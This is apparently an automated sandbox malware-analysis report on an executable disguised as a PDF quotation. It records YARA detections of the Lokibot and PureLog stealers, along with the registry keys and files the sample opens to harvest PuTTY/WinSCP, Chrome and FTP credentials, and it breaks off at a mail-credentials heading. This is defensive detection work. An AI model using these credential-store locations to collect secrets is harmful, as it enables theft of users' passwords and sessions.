Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Queries volume information: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation

Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.mexnJkivovwH.exe.3c45590.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.mexnJkivovwH.exe.3ebf078.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.mexnJkivovwH.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.mexnJkivovwH.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1714510226.0000000004DB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1749098659.000000000245E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1751386297.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1713091318.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1751386297.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quotation2025-0107pdf.exe PID: 7332, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mexnJkivovwH.exe PID: 7908, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mexnJkivovwH.exe PID: 8124, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000008.00000002.2909417745.0000000000A92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quotation2025-0107pdf.exe PID: 7772, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 9.2.mexnJkivovwH.exe.3cca880.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quotation2025-0107pdf.exe.4b08eb0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quotation2025-0107pdf.exe.9a00000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.mexnJkivovwH.exe.3cea8a0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quotation2025-0107pdf.exe.4ae8e90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.mexnJkivovwH.exe.3cea8a0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quotation2025-0107pdf.exe.4ae8e90.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quotation2025-0107pdf.exe.9a00000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.mexnJkivovwH.exe.3cca880.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1720797556.0000000009A00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1714510226.0000000004AC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1751386297.0000000003CA8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1751386297.0000000003CEA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

